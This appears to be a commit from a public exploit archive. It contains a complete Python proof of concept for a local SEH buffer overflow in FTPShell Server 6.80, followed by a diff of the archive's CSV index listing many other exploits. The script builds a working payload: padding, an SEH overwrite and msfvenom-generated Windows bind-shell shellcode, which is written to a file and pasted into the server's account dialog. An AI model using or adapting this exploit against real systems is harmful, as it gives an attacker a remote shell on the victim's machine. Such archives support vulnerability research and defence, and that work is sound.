# Vendor Homepage: http://www.ftpshell.com/
# Software Link: http://www.ftpshell.com/downloadserver.htm
# Tested Version: 6.80
# Vulnerability Type: Buffer Overflow (SEH) Local
# Tested on OS: Windows XP Professional SP3 x86 es
# Steps to Produce the Buffer Overflow (SEH):
# 1.- Run python code : FTPShell_Server_6.80.py
# 2.- Open FTPShell_Server_6.80.txt and copy content to clipboard
# 3.- Open FTPShell Server Administrator
# 4.- Manage FTP Accounts...
# 5.- Add Account Name
# 6.- Paste ClipBoard on "Account name to ban"
# 7.- OK
#!/usr/bin/env python
#msfvenom -p windows/shell_bind_tcp -b '\x00\x0A\x0D' -f c
shellcode = (
"\xbb\x3c\xd8\x80\xcc\xda\xc3\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"
"\x53\x31\x5a\x12\x03\x5a\x12\x83\xd6\x24\x62\x39\xda\x3d\xe1"
"\xc2\x22\xbe\x86\x4b\xc7\x8f\x86\x28\x8c\xa0\x36\x3a\xc0\x4c"
"\xbc\x6e\xf0\xc7\xb0\xa6\xf7\x60\x7e\x91\x36\x70\xd3\xe1\x59"
"\xf2\x2e\x36\xb9\xcb\xe0\x4b\xb8\x0c\x1c\xa1\xe8\xc5\x6a\x14"
"\x1c\x61\x26\xa5\x97\x39\xa6\xad\x44\x89\xc9\x9c\xdb\x81\x93"
"\x3e\xda\x46\xa8\x76\xc4\x8b\x95\xc1\x7f\x7f\x61\xd0\xa9\xb1"
"\x8a\x7f\x94\x7d\x79\x81\xd1\xba\x62\xf4\x2b\xb9\x1f\x0f\xe8"
"\xc3\xfb\x9a\xea\x64\x8f\x3d\xd6\x95\x5c\xdb\x9d\x9a\x29\xaf"
"\xf9\xbe\xac\x7c\x72\xba\x25\x83\x54\x4a\x7d\xa0\x70\x16\x25"
"\xc9\x21\xf2\x88\xf6\x31\x5d\x74\x53\x3a\x70\x61\xee\x61\x1d"
"\x46\xc3\x99\xdd\xc0\x54\xea\xef\x4f\xcf\x64\x5c\x07\xc9\x73"
"\xa3\x32\xad\xeb\x5a\xbd\xce\x22\x99\xe9\x9e\x5c\x08\x92\x74"
"\x9c\xb5\x47\xe0\x94\x10\x38\x17\x59\xe2\xe8\x97\xf1\x8b\xe2"
"\x17\x2e\xab\x0c\xf2\x47\x44\xf1\xfd\x76\xc9\x7c\x1b\x12\xe1"
"\x28\xb3\x8a\xc3\x0e\x0c\x2d\x3b\x65\x24\xd9\x74\x6f\xf3\xe6"
"\x84\xa5\x53\x70\x0f\xaa\x67\x61\x10\xe7\xcf\xf6\x87\x7d\x9e"
"\xb5\x36\x81\x8b\x2d\xda\x10\x50\xad\x95\x08\xcf\xfa\xf2\xff"
"\x06\x6e\xef\xa6\xb0\x8c\xf2\x3f\xfa\x14\x29\xfc\x05\x95\xbc"
"\xb8\x21\x85\x78\x40\x6e\xf1\xd4\x17\x38\xaf\x92\xc1\x8a\x19"
"\x4d\xbd\x44\xcd\x08\x8d\x56\x8b\x14\xd8\x20\x73\xa4\xb5\x74"
"\x8c\x09\x52\x71\xf5\x77\xc2\x7e\x2c\x3c\xf2\x34\x6c\x15\x9b"
"\x90\xe5\x27\xc6\x22\xd0\x64\xff\xa0\xd0\x14\x04\xb8\x91\x11"
"\x40\x7e\x4a\x68\xd9\xeb\x6c\xdf\xda\x39")
nSEH = "\xEB\x06\x90\x90"
SEH = "\x47\x05\xFC\x7F" #7FFC0547 POP EDI
buffer = "\x41" * 1268 + nSEH + SEH + shellcode
f = open ("FTPShell_Server_6.80.txt", "w")
f.write(buffer)
f.close()

12
files_exploits.csv
View file

@ -6142,6 +6142,8 @@ id,file,description,date,author,type,platform,port
45547,exploits/linux/dos/45547.txt,"net-snmp 5.7.3 - Authenticated Denial of Service (PoC)",2018-10-08,"Magnus Klaaborg Stubman",dos,linux,
45557,exploits/linux/dos/45557.c,"Linux - Kernel Pointer Leak via BPF",2018-10-08,"Google Security Research",dos,linux,
45558,exploits/android/dos/45558.txt,"Android - sdcardfs Changes current->fs Without Proper Locking",2018-10-08,"Google Security Research",dos,android,
45571,exploits/windows/dos/45571.js,"Microsoft Edge Chakra JIT - 'BailOutOnInvalidatedArrayHeadSegment' Check Bypass",2018-10-09,"Google Security Research",dos,windows,
45572,exploits/windows/dos/45572.js,"Microsoft Edge Chakra JIT - Type Confusion",2018-10-09,"Google Security Research",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -9808,6 +9810,7 @@ id,file,description,date,author,type,platform,port
44167,exploits/windows_x86/local/44167.c,"NoMachine < 6.0.80 (x86) - 'nxfuse' Privilege Escalation",2018-02-22,"Fidus InfoSecurity",local,windows_x86,
44168,exploits/windows_x86-64/local/44168.py,"NoMachine < 6.0.80 (x64) - 'nxfuse' Privilege Escalation",2018-02-22,"Fidus InfoSecurity",local,windows_x86-64,
44169,exploits/windows/local/44169.txt,"Armadito Antivirus 0.12.7.2 - Detection Bypass",2018-02-22,"Souhail Hammou",local,windows,
45568,exploits/windows/local/45568.txt,"Seqrite End Point Security 7.4 - Privilege Escalation",2018-10-09,"Hashim Jawad",local,windows,
44177,exploits/hardware/local/44177.c,"Sony Playstation 4 (PS4) 4.07 < 4.55 - 'bpf' Local Kernel Code Execution (PoC)",2018-02-26,qwertyoruiop,local,hardware,
44218,exploits/windows/local/44218.py,"IrfanView 4.50 Email Plugin - Buffer Overflow (SEH Unicode)",2018-03-02,bzyo,local,windows,
44198,exploits/hardware/local/44198.md,"Sony Playstation 4 (PS4) 3.50 < 4.07 - WebKit Code Execution (PoC)",2017-04-08,Specter,local,hardware,
@ -9883,6 +9886,7 @@ id,file,description,date,author,type,platform,port
44601,exploits/linux/local/44601.txt,"GNU wget - Cookie Injection",2018-05-06,"Harry Sintonen",local,linux,
44603,exploits/windows/local/44603.txt,"Microsoft Windows FxCop 10/12 - XML External Entity Injection",2018-05-09,hyp3rlinx,local,windows,
44614,exploits/windows/local/44614.txt,"EMC RecoverPoint 4.3 - 'Admin CLI' Command Injection",2018-05-11,"Paul Taylor",local,windows,
45565,exploits/windows_x86-64/local/45565.py,"Free MP3 CD Ripper 2.8 - '.wma' Buffer Overflow (SEH) (DEP Bypass)",2018-10-09,"Matteo Malvica",local,windows_x86-64,
44630,exploits/windows/local/44630.txt,"Microsoft Windows - Token Process Trust SID Access Check Bypass Privilege Escalation",2018-05-16,"Google Security Research",local,windows,
44633,exploits/linux/local/44633.rb,"Libuser - 'roothelper' Privilege Escalation (Metasploit)",2018-05-16,Metasploit,local,linux,
44644,exploits/hardware/local/44644.txt,"Microsoft Xbox One 10.0.14393.2152 - Code Execution (PoC)",2017-03-31,unknownv2,local,hardware,
@ -10016,11 +10020,12 @@ id,file,description,date,author,type,platform,port
45516,exploits/linux/local/45516.c,"Linux Kernel 2.6.x / 3.10.x / 4.14.x (RedHat / Debian / CentOS) (x64) - 'Mutagen Astronomy' Local Privilege Escalation",2018-09-26,"Qualys Corporation",local,linux,
45528,exploits/linux/local/45528.txt,"virtualenv 16.0.0 - Sandbox Escape",2018-10-04,vr_system,local,linux,
45531,exploits/windows_x86/local/45531.py,"NICO-FTP 3.0.1.19 - Buffer Overflow (SEH) (ASLR Bypass)",2018-10-04,"Miguel Mendez Z",local,windows_x86,
45540,exploits/windows/local/45540.py,"360 3.5.0.1033 - Sandbox Escape",2018-10-08,vr_system,local,windows,
45548,exploits/linux/local/45548.txt,"Git Submodule - Arbitrary Code Execution",2018-10-05,"Junio C Hamano",local,linux,
45553,exploits/linux/local/45553.c,"Linux Kernel < 4.11.8 - 'mq_notify: double sock_put()' Local Privilege Escalation",2018-10-02,Lexfo,local,linux,
45560,exploits/windows/local/45560.rb,"Zahir Enterprise Plus 6 - Stack Buffer Overflow (Metasploit)",2018-10-08,Metasploit,local,windows,
45562,exploits/windows/local/45562.rb,"Microsoft Windows - Net-NTLMv2 Reflection DCOM/RPC (Metasploit)",2018-10-08,Metasploit,local,windows,
45573,exploits/linux/local/45573.txt,"ghostscript - executeonly Bypass with errorhandler Setup",2018-10-09,"Google Security Research",local,linux,
45575,exploits/linux/local/45575.rb,"ifwatchd - Privilege Escalation (Metasploit)",2018-10-09,Metasploit,local,linux,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -16846,7 +16851,6 @@ id,file,description,date,author,type,platform,port
45265,exploits/linux/remote/45265.js,"Node.JS - 'node-serialize' Remote Code Execution",2017-02-08,OpSecX,remote,linux,
45272,exploits/multiple/remote/45272.txt,"Electron WebPreferences - Remote Code Execution",2018-08-27,"Matt Austin",remote,multiple,
45273,exploits/unix/remote/45273.rb,"HP Jetdirect - Path Traversal Arbitrary Code Execution (Metasploit)",2018-08-27,Metasploit,remote,unix,
45333,exploits/windows_x86/remote/45333.py,"FTPShell Server 6.80 - 'Add Account Name' Buffer Overflow (SEH)",2018-09-05,"Luis Martínez",remote,windows_x86,
45283,exploits/hardware/remote/45283.rb,"Eaton Xpert Meter 13.4.0.10 - SSH Private Key Disclosure",2018-08-29,BrianWGray,remote,hardware,
45345,exploits/linux/remote/45345.txt,"Tenable WAS-Scanner 7.4.1708 - Remote Command Execution",2018-09-07,"Sameer Goyal",remote,linux,
45367,exploits/multiple/remote/45367.rb,"Apache Struts 2 - Namespace Redirect OGNL Injection (Metasploit)",2018-09-10,Metasploit,remote,multiple,
@ -16857,6 +16861,7 @@ id,file,description,date,author,type,platform,port
45555,exploits/multiple/remote/45555.rb,"Cisco Prime Infrastructure - Unauthenticated Remote Code Execution",2018-10-04,SecuriTeam,remote,multiple,
45559,exploits/linux/remote/45559.rb,"Unitrends UEB - HTTP API Remote Code Execution (Metasploit)",2018-10-08,Metasploit,remote,linux,443
45561,exploits/php/remote/45561.rb,"Navigate CMS - Unauthenticated Remote Code Execution (Metasploit)",2018-10-08,Metasploit,remote,php,
45574,exploits/windows/remote/45574.rb,"Delta Electronics Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (Metasploit)",2018-10-09,Metasploit,remote,windows,502
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -38669,6 +38674,7 @@ id,file,description,date,author,type,platform,port
43978,exploits/php/webapps/43978.txt,"Joomla! Component JSP Tickets 1.1 - SQL Injection",2018-02-05,"Ihsan Sencan",webapps,php,
43980,exploits/php/webapps/43980.txt,"Student Profile Management System Script 2.0.6 - Authentication Bypass",2018-02-05,L0RD,webapps,php,
43981,exploits/hardware/webapps/43981.txt,"Netis WF2419 Router - Cross-Site Scripting",2018-02-05,"Sajibe Kanti",webapps,hardware,
45564,exploits/php/webapps/45564.txt,"Wikidforum 2.20 - 'select_sort' SQL Injection",2018-10-09,seccops,webapps,php,
43994,exploits/php/webapps/43994.txt,"Online Test Script 2.0.7 - 'cid' SQL Injection",2018-02-07,L0RD,webapps,php,80
43995,exploits/php/webapps/43995.txt,"Entrepreneur Dating Script 2.0.2 - Authentication Bypass",2018-02-07,L0RD,webapps,php,80
44008,exploits/php/webapps/44008.txt,"Naukri Clone Script 3.0.3 - 'indus' SQL Injection",2018-02-10,L0RD,webapps,php,
@ -39746,6 +39752,7 @@ id,file,description,date,author,type,platform,port
44737,exploits/php/webapps/44737.txt,"WordPress Plugin Peugeot Music - Arbitrary File Upload",2018-05-23,Mr.7z,webapps,php,
44739,exploits/asp/webapps/44739.txt,"ASP.NET jVideo Kit - 'query' SQL Injection",2018-05-24,AkkuS,webapps,asp,
44746,exploits/php/webapps/44746.txt,"PaulNews 1.0 - 'keyword' SQL Injection / Cross-Site Scripting",2018-05-24,AkkuS,webapps,php,
45569,exploits/php/webapps/45569.txt,"Wikidforum 2.20 - 'message_id' SQL Injection",2018-10-09,"Ihsan Sencan",webapps,php,
45336,exploits/hardware/webapps/45336.txt,"Tenda ADSL Router D152 - Cross-Site Scripting",2018-09-05,"Sandip Dey",webapps,hardware,80
44748,exploits/php/webapps/44748.html,"Timber 1.1 - Cross-Site Request Forgery",2018-05-24,L0RD,webapps,php,
44749,exploits/linux/webapps/44749.txt,"Honeywell XL Web Controller - Cross-Site Scripting",2018-05-24,t4rkd3vilz,webapps,linux,
@ -39944,7 +39951,6 @@ id,file,description,date,author,type,platform,port
45153,exploits/java/webapps/45153.txt,"LAMS < 3.1 - Cross-Site Scripting",2018-08-06,"Nikola Kojic",webapps,java,8080
45154,exploits/php/webapps/45154.html,"onArcade 2.4.2 - Cross-Site Request Forgery (Add Admin)",2018-08-06,r3m0t3nu11,webapps,php,443
45155,exploits/php/webapps/45155.txt,"CMS ISWEB 3.5.3 - Directory Traversal",2018-08-06,"Thiago Sena",webapps,php,
45156,exploits/php/webapps/45156.txt,"Monstra 3.0.4 - Cross-Site Scripting",2018-08-06,"Nainsi Gupta",webapps,php,80
45158,exploits/java/webapps/45158.txt,"Wavemaker Studio 6.6 - Server-Side Request Forgery",2018-08-06,"Gionathan Reale",webapps,java,
45266,exploits/windows/webapps/45266.txt,"Sentrifugo HRMS 3.2 - 'deptid' SQL Injection",2018-08-27,"Javier Olmedo",webapps,windows,
45164,exploits/php/webapps/45164.txt,"Monstra-Dev 3.0.4 - Cross-Site Request Forgery (Account Hijacking)",2018-08-07,"Nainsi Gupta",webapps,php,

Can't render this file because it is too large.